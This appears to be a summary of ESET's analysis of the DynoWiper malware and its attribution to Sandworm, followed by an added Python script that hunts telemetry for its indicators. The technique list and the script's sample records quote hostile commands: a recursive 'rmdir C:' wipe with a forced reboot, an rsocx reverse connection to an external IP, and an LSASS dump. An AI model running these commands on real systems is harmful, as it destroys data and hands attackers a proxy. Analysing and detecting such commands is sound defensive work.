DynoWiper update: Technical analysis and attribution

ESET researchers detailed DynoWiper, a new data-wiping malware deployed against an energy company in Poland that was prevented from fully executing by ESET PROTECT. The activity shows strong TTP overlap with previous Sandworm operations (including similarities to the ZOV wiper and AD/GPO deployment scripts), and ESET attributes DynoWiper to Sandworm with medium confidence. #DynoWiper #Sandworm

Key points

  • ESET discovered DynoWiper deployed at a Polish energy company on 2025-12-29; ESET PROTECT blocked execution and limited damage.
  • DynoWiper was deployed to a shared directory (C:\inetpub\pub) as schtask.exe, schtask2.exe, and _update.exe, with successive rebuilds on the same day.
  • The wiper runs in three phases (recursive overwrite excluding specific directories, a second-phase sweep with different behaviors, and a forced reboot) and uses a 16-byte random buffer to overwrite files.
  • Attackers attempted to use tools like Rubeus and rsocx (SOCKS5 proxy) and tried LSASS dumping via Windows Task Manager prior to wiper deployment.
  • DynoWiper’s TTPs and deployment mechanisms closely resemble the ZOV wiper and Sandworm’s historical use of AD/GPO and custom PowerShell deployment scripts.
  • ESET attributes DynoWiper to the Russia-aligned Sandworm group with medium confidence, noting both supporting overlaps and contradicting factors (lack of visibility into initial access and some behavioral differences).

MITRE Techniques

  • [T1584.004] Compromise Infrastructure: Server – A likely compromised server was used to host a SOCKS5 server. (‘SOCKS5 server.’)
  • [T1059.001] Command and Scripting Interpreter: PowerShell – PowerShell scripts were used for deployment across domains and to distribute the wiper via Group Policy. (‘PowerShell scripts for deployment in the target organizations.’)
  • [T1059.003] Command and Scripting Interpreter: Windows Command Shell – The ZOV wiper runs shell commands to print the time and Windows version, erase C:, and reboot the system. (‘time /t & ver & rmdir C: /s /q && dir && shutdown /r’)
  • [T1053.005] Scheduled Task/Job: Scheduled Task – Both the ZOV wiper and DynoWiper are executed using Windows scheduled tasks in observed incidents. (‘The ZOV wiper and DynoWiper are executed using Windows scheduled tasks.’)
  • [T1003.001] OS Credential Dumping: LSASS Memory – Attackers attempted to dump LSASS process memory as part of credential access activities. (‘attempted to dump the LSASS process using Windows Task Manager.’)
  • [T1083] File and Directory Discovery – The wipers enumerate files and directories across fixed and removable drives to identify targets for wiping. (‘search for files and directories in order to wipe them.’)
  • [T1680] Local Storage Discovery – The malware identifies additional disks present on the system to expand the wiping scope. (‘identify additional disks present on the system to subsequently wipe data on them.’)
  • [T1082] System Information Discovery – The ZOV sample prints Windows version information during its execution. (‘prints the Windows version of the running system.’)
  • [T1124] System Time Discovery – The ZOV sample prints the local system time as part of its reporting. (‘prints current local time.’)
  • [T1105] Ingress Tool Transfer – Attackers attempted to download publicly available tooling such as Rubeus and rsocx into the target environment. (‘The attackers tried to download Rubeus and rsocx in the target organization.’)
  • [T1090.002] Proxy: External Proxy – The adversary attempted to establish a reverse connection to an external SOCKS5 proxy using rsocx. (‘C:\Users\<user>\Downloads\r.exe -r 31.172.71[.]5:8008’)
  • [T1561.001] Disk Wipe: Disk Content Wipe – Both ZOV and DynoWiper overwrite file contents (full overwrite for small files, partial for large files) as their primary destructive action. (‘overwrite contents of files.’)
  • [T1529] System Shutdown/Reboot – After wiping activity, the malware forces a system reboot to complete destruction. (‘reboot the system after the wiping process is complete.’)

Indicators of Compromise

  • [SHA-1] Wiper and tool samples – 472CA448F82A7FF6F373A32FDB9586FD7C38B631 (ZOV wiper), 4EC3C90846AF6B79EE1A5188EEFA3FD21F6D4CF6 (_update.exe / DynoWiper), and 5 more hashes.
  • [Filename] Deployed binaries and wiper filenames – schtask.exe, schtask2.exe, _update.exe (deployed to C:\inetpub\pub).
  • [Filename] Tooling used in the intrusion – Rubeus.exe (Kerberos tool), rsocx.exe (SOCKS5 proxy tool used for external proxying).
  • [File path] Observed deployment and download locations – C:\inetpub\pub (wiper deployment directory), C:\Users\<user>\Downloads\rubeus.exe (attempted tool download; the user profile segment is not given in the source).
  • [IP] SOCKS5 proxy server – 31.172.71[.]5 (Fornex Hosting S.L.; used as the rsocx reverse-connect endpoint).
  • [Domain] Likely abused/compromised host – progamevl[.]ru (associated with the SOCKS5 server used in the operation).
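The indicators and techniques above are most useful once they are turned into something that runs over telemetry. The script below is an added example written for this summary, not ESET's tooling: it takes the paths, filenames, SHA-1s and rsocx endpoint exactly as listed here and applies simple matching rules to Sysmon-style process-creation (EventID 1) and file-creation (EventID 11) records. The rules, the field names, the assumption that Task Manager writes its dump as lsass.DMP, and all of the sample records are constructed for illustration and are not from the incident.

```python
"""
Hunt for the DynoWiper / ZOV indicators and TTPs summarised above across
Sysmon-style process-creation (EventID 1) and file-creation (EventID 11)
records.

Added example, not ESET's code. Paths, filenames, SHA-1s and the rsocx
endpoint are taken from the summary; the rules, field names and the sample
records are assumptions made here for illustration.
"""
import re
from typing import Dict, List, Tuple

# --- Indicators from the summary (ESET) --------------------------------------
WIPER_DIR = r"c:\inetpub\pub"
WIPER_NAMES = {"schtask.exe", "schtask2.exe", "_update.exe"}
KNOWN_SHA1 = {
    "472ca448f82a7ff6f373a32fdb9586fd7c38b631",  # ZOV wiper
    "4ec3c90846af6b79ee1a5188eefa3fd21f6d4cf6",  # _update.exe (DynoWiper)
}
SOCKS_ENDPOINT = "31.172.71.5:8008"               # rsocx reverse-connect target
TOOL_NAMES = {"rubeus.exe", "rsocx.exe"}

# --- Constructed telemetry (not real logs; usernames are invented) ------------
SAMPLE_RECORDS: List[Dict[str, str]] = [
    {"EventID": "1", "Image": r"C:\inetpub\pub\schtask2.exe",
     "CommandLine": r"C:\inetpub\pub\schtask2.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",   # task-scheduler parent
     "Hashes": "SHA1=4EC3C90846AF6B79EE1A5188EEFA3FD21F6D4CF6"},
    {"EventID": "1", "Image": r"C:\Users\j.doe\Downloads\r.exe",
     "CommandLine": r"C:\Users\j.doe\Downloads\r.exe -r 31.172.71.5:8008",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Hashes": "SHA1=0000000000000000000000000000000000000000"},
    {"EventID": "11", "Image": r"C:\Windows\System32\Taskmgr.exe",
     "TargetFilename": r"C:\Users\j.doe\AppData\Local\Temp\lsass.DMP"},
    {"EventID": "11", "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\j.doe\Downloads\rubeus.exe"},
    {"EventID": "1", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c "time /t & ver & rmdir C: /s /q && dir && shutdown /r"',
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Hashes": "SHA1=2222222222222222222222222222222222222222"},
    {"EventID": "1", "Image": r"C:\Program Files\Vendor\updater.exe",   # benign
     "CommandLine": r"C:\Program Files\Vendor\updater.exe --check",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "Hashes": "SHA1=1111111111111111111111111111111111111111"},
]


def _base(path: str) -> str:
    """Lower-cased file name component of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _dir(path: str) -> str:
    """Lower-cased directory component of a Windows path ('' if none)."""
    p = path.replace("/", "\\")
    return p.rsplit("\\", 1)[0].lower() if "\\" in p else ""


def _sha1(hashes: str) -> str:
    """Extract the SHA1 value from a Sysmon 'Hashes' field such as 'SHA1=..,MD5=..'."""
    m = re.search(r"SHA1=([0-9a-fA-F]{40})", hashes or "")
    return m.group(1).lower() if m else ""


def classify(rec: Dict[str, str]) -> List[str]:
    """Return the names of every rule the record matches (empty list if benign)."""
    hits: List[str] = []
    image = rec.get("Image", "")
    cmd = rec.get("CommandLine", "")
    target = rec.get("TargetFilename", "")

    # Wiper executed from, or written to, the shared deployment directory.
    for path in (image, target):
        if path and _dir(path) == WIPER_DIR and _base(path) in WIPER_NAMES:
            hits.append("wiper_binary_in_inetpub_pub")
            break
    # Exact sample match on the published SHA-1s.
    if _sha1(rec.get("Hashes", "")) in KNOWN_SHA1:
        hits.append("known_wiper_sha1")
    # rsocx reverse connection to the published SOCKS5 endpoint (any binary name).
    if SOCKS_ENDPOINT in cmd.replace("[.]", "."):
        hits.append("rsocx_reverse_socks5")
    # Rubeus / rsocx dropped or run under their default names.
    if _base(image) in TOOL_NAMES or _base(target) in TOOL_NAMES:
        hits.append("offensive_tooling_dropped")
    # Assumption: Task Manager's "Create dump file" writes <process>.DMP, so an
    # lsass.DMP created by taskmgr.exe is the manual LSASS dump described above.
    if _base(image) == "taskmgr.exe" and _base(target) == "lsass.dmp":
        hits.append("lsass_dump_via_task_manager")
    # ZOV-style shell wipe: recursive delete of C: followed by a forced reboot.
    if re.search(r"rmdir\s+c:\s+/s\s+/q", cmd, re.I) and re.search(r"shutdown\s+/r", cmd, re.I):
        hits.append("zov_style_shell_wipe")
    return hits


def hunt(records: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """Return (record index, matched rules) for every record that matches at least one rule."""
    return [(i, hits) for i, rec in enumerate(records) if (hits := classify(rec))]


if __name__ == "__main__":
    for idx, rules in hunt(SAMPLE_RECORDS):
        print(f"record {idx}: {', '.join(rules)}")
```

The hash and path rules are exact and will only ever fire on the published samples and the deployment directory; the rsocx, Task Manager and shell-wipe rules are behavioural and are the ones worth keeping after the hashes have rotated. Note that the rsocx rule matches on the endpoint rather than the binary name, because the observed binary was renamed to r.exe.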

Read more: https://www.welivesecurity.com/en/eset-research/dynowiper-update-technical-analysis-attribution/